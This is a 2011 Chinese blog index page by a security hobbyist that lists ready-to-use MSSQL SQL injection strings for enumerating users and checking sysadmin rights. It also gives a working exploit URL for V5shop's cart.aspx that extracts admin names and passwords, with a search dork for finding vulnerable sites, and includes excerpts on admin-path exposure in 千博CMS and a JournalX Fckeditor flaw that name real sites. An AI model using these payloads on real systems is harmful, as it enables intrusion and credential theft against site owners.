查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

小猪太子--网易博客

关注网络安全,低调求发展。

 
 
 
 
 
 

常用的一些注入命令,方便一下大家

2011-12-3 17:45:12 阅读705 评论0 32011/12 Dec3

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
 and user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);-- 

作者  | 2011-12-3 17:45:12 | 阅读(705) |评论(0) | 阅读全文>>

千博cms地图导致后台和编辑器暴漏

2011-11-6 1:53:30 阅读563 评论0 62011/11 Nov6

简要描述:

三茗网络科技有限公司做的全是千博CMS开源的,Admin_SiteMap.asp文件没有过滤后台地址而导致漏洞


详细说明:

网站是千博CMS开源的,因为没有设置Admin_SiteMap.asp过滤后台,从而导致后台和编辑器暴漏在网站地图中。


漏洞证明:


如图所示

千博cms地图导致后台和编辑器暴漏 - 小猪太子 - 小猪太子S 博客
 
修复方案:

作者  | 2011-11-6 1:53:30 | 阅读(563) |评论(0) | 阅读全文>>

三茗网络智能三代建站0DAY

2011-9-23 17:21:17 阅读689 评论0 232011/09 Sept23

我一直用三茗网络http://www.dg1.cn的建站程序,总体来说服务和建站,在东莞当地是相当不错的一个网络公司了。自己的站嘛,当然也看看安全啦。
不锈钢http://www.dgjunyue.com 这个的站。我们来分析下吧。建站是千博CMS,我特地下载了一个千博CMS的源码,然后分析了下。
程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code
 

作者  | 2011-9-23 17:21:17 | 阅读(689) |评论(0) | 阅读全文>>

Journal报刊系统Fckeditor-0day

2011-9-13 23:53:09 阅读582 评论0 132011/09 Sept13

影响版本:JournalX 2.0  
官方网站:http://www.magtech.com.cn

产品介绍:

JournalX 2.0率先为出版社/集团、期刊业推出了整体的解决方案。目前已经在遍布全国的600多家杂志社、十几家出版社得到应用。

作者  | 2011-9-13 23:53:09 | 阅读(582) |评论(0) | 阅读全文>>

V5shop注入漏洞

2011-8-25 9:02:12 阅读2446 评论1 252011/08 Aug25

漏洞危害:高危
一、漏洞文件:cart.aspx

搜索关键词:inurl:scoreindex.aspx

exp :

/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

作者  | 2011-8-25 9:02:12 | 阅读(2446) |评论(1) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
 

广东省 东莞市 金牛座

 发消息  写留言

 
看起来没什么新鲜的,其貌不扬,个头一般,没獠牙,呼吸空气,肋下没逆鳞,吃的是碳水化合物,看构造变形的可能性也不大,人畜无害的家伙。
 
近期心愿银行卡小数点前面的数字再涨几位!
专长技能吃饭,睡觉。
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 

日志分类

 
 
日志分类列表加载中...
 
 
 
 
 

友情链接

 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018

注册 登录  
 加关注